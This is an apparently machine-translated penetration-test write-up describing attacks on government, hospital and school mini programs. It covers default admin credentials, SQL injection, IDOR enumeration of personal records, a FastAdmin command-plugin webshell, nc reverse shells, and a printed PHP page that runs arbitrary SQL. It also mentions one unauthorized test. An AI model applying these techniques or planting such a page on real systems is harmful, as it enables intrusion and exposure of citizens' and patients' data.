Title: Summary of sharing cases for mini program management

0x00 Introduction

Just ended HVV in a certain place, mini programs, as low-cost and easy-to-use information system, have become the key breakthrough target of HVV's new type. The following cases are all from mini programs for everyone to learn.

0x01 Case 1 A certain government affairs system

1. Weak password enters the background

Click on the mini program, enter the citizen service, catch the mini program domain name, and directly access the administrator background. The following page is the Fastadmin framework.

There has always been a pitfall. The password is invalid when logging in. When I want to give up, click to return to the previous step to remind me that you are logged in. I wondered. I found that the token will be refreshed after the system logs in, which causes the previous token to be used for the next login, otherwise the password will be invalid. Therefore, it should be that the network or system itself has delays, resulting in the login operation not being successfully used with the correct token. When I discovered this problem, I had logged into the background by admin/123456.

It contains nearly 20,000 citizen information, as well as hundreds of administrator accounts, and the account names and passwords in all administrator accounts are admin/123456. It is similar to the case four system in the prefecture-level city HVV | unauthorized access to the collection. (Damn it)

2. SQL injection is everywhere

The front-end business office has the following package. The debug is not closed, causing the database account name and password to be exposed. This SQL injection is too obvious, but at this time I was in the joy of the database account secrets and did not do SQL injection. However, this database is not external and can only connect locally, which is very annoying.

Delay injection exists when viewing administrators in the background

3. Command execution takes down the server and database

Since it is fastadmin, there are many ways to get shells. This time, I used the online command plug-in vulnerability to write to PHP Webshell, which is only available in 1.1.0.

However, this system is open for two, and there is no place for plug-ins at all. I searched the splicing page for plug-ins online.

The directory is: /addon?ref=addtabs

The directory of the plug-in should be /addon/command?ref=addtabs, but the page does not exist. I thought the route was not set, so I banned this until my teammate found out in an article that directly commanded the plug-in, that is, the directory is /command?ref=addtabs

Click to generate the API document with one click. The file is php and the title is written as a Trojan horse. Only the Ice Scorpion Horse can test it. There were similar cases before.

Connecting Trojan successfully

By circulating the NC in Malaysia to increase power, the shell will be rebounded to the cloud server to obtain root permissions.

Malaysia will report errors and garbled codes when executing SQL statements.

I still remember the database account password. I connected to the database by writing a php file of the SQL execution page by myself. Prove that I have taken the database permissions.

The code is as follows:

html

head

title executes MySQL statement/title

/head

Body

h1Execute MySQL statement/h1

form method='POST' action=''

textarea name='sql_statement' rows='5' cols='50' placeholder='Please enter MySQL statement'/textarea

br

input type='submit' value='execution'

/form

?php

//Check whether the form has been submitted

if ($_SERVER['REQUEST_METHOD']==='POST') {

//Get the MySQL statement entered by the user

$sql_statement=$_POST['sql_statement'];

//Connect to MySQL database

$host='localhost';

$username='';

$password='';

$database='';

$connection=mysqli_connect($host, $username, $password, $database);

//Execute MySQL query

$result=mysqli_query($connection, $sql_statement);

//Check the query results

if ($result) {

//Echo the query results

echo 'h2 query result: /h2';

while ($row=mysqli_fetch_assoc($result)) {

echo '';

print_r($row);

echo '';

}

} else {

//Display error message

echo 'h2 error: /h2';

echo 'p' . mysqli_error($connection) . '/p';

}

//Close the database connection

mysqli_close($connection);

}

?

/body

/html

0x02 Case 2 A county hospital database

1.SQL injection takes DBA

The hospital's SQL injection is in the public account registration. When I log in, I click on the registration record and caught a package with the patient ID.

Added a single quote, an error order by

I found that I couldn't run directly with SQLmap, but the injection does exist. Discovering the asp.net framework means that the other party's system is Windows.

Specify databases MySQL, Oracle, and MSSQL respectively. Finally, the injection runs out during MSSQL and is DBA permissions.

I thought that xp_cmdshell could execute commands, but unfortunately this is HIS. I have taken the protection, and I can't execute commands no matter how I set it up, so I gave up changing the target.

0x03 Case 3 Visitor system of a middle school

1. Unauthorized + Information leakage

Open the mini program to catch the package and directly capture all the information of the interviewees. One interface is not authorized to access.

It's like this before logging in, so it's a good idea to log in.

Log in and added an access application

Catch the package when viewing your access application record

Grab the following link: app/visitor/getVisitorInfo?viId=1. You can get hundreds of visitor information and visitor records by traversing. It is considered to be a parallel overreach, and finally it is found that it is even unauthorized to access and has no permission to verify.

0x04 Case 4 I missed

This case is quite funny. I was searching for a mini program. It popped up a small program with one word. I started typing without looking carefully. It is also a county hospital.

This should be a mini program specially made for nucleic acid testing appointments during the epidemic.

1. Parallel overreach + information leakage

If the ID card name does not match when logging in, it cannot pass the verification, which means that the ID card information inside is all real. Log in and you are used to looking for the function with user ID, and click on the medical visitor list to catch the packet.

I found my phone, ID, name, and gender

Modify the id to view other people's information, a total of more than 100,000 pieces, which is definitely parallel and overstepped.

2. Parallel overriding SQL injection

Habitually adding single quotes and directly reporting an error. The page shows SQL error. Isn't this the corresponding one? The edu-SQL injection case shares the last summary. There is a high probability that SQL injection will exist in parallel overstep. But I made a mistake and didn't have authorization, so I stopped and gave up and handed over to the platform for rectification in the future.

Original link: https://forum.butian.net/share/2400